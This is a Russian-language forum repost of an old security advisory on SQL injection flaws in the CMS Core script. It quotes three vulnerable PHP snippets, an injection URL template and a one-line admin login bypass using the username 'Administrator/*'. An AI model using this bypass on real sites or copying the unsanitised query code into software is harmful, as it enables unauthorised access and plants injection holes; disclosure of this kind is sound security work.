Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чужие Статьи (https://forum.antichat.xyz/forumdisplay.php?f=32)
-   -   SQL injection in CMScore (найдено ghc) (https://forum.antichat.xyz/showthread.php?t=5074)

Rebz 06.02.2005 18:31

SQL injection in CMScore (найдено ghc)
 
*==========================================*/
// GHC -> CMS CORE <- ADVISORY
// Продукт: CMS Core
// Адрес: http://chipmunk-scripts.com/scripts/cmscore.php
// Уязвимость: SQL injection
// Опасность: высокая
/*==========================================*/

[1] уязвимый скрипт: index.php

---
Код:

---
$EntryID=$_GET[EntryID];
...
$article="SELECT * FROM CMS_articles where EntryID=$EntryID";
---

---

Возможность sql инъекции:
http://CMScore/index.php?EntryID=[SQL code]

[2] уязвимый скрипт: index.php

---
Код:

---
$searchterm=$_POST[searchterm];
...
$newselect="Select * FROM CMS_articles where title LIKE %$searchterm% OR shortdescription
LIKE %$searchterm% OR body LIKE %$searchterm% order by EntryID DESC LIMIT $start,
$numentries";
---

---

Возможность SQL инъекции через переменную $searchterm из поисковой формы.

[3] уязвимый скрипт: admin/authenticate.php

---
Код:

---
$username=$_POST[username];
$password=$_POST[password];
$password=md5($password);
$query = "select * from CMS_logintable where username=$username and
password=$password";
$result=mysql_query($query) or die("Could not Query");
---

---

Возможность SQL инъекции чере переменную $username.

[exploit]
Заходим под именем
Administrator/*
на странице admin/index.php.

[примечание]
"Administrator" должно быть имя существующего пользователя.

/* ================================================== */
/* www.ghc.ru -- security games & challenges */
/* ================================================== */
/* greets to: 1dt.w0lf & RST.void.ru, D0G4 */
/* & all quest hunters %) */
/* ================================================== */


Время: 13:49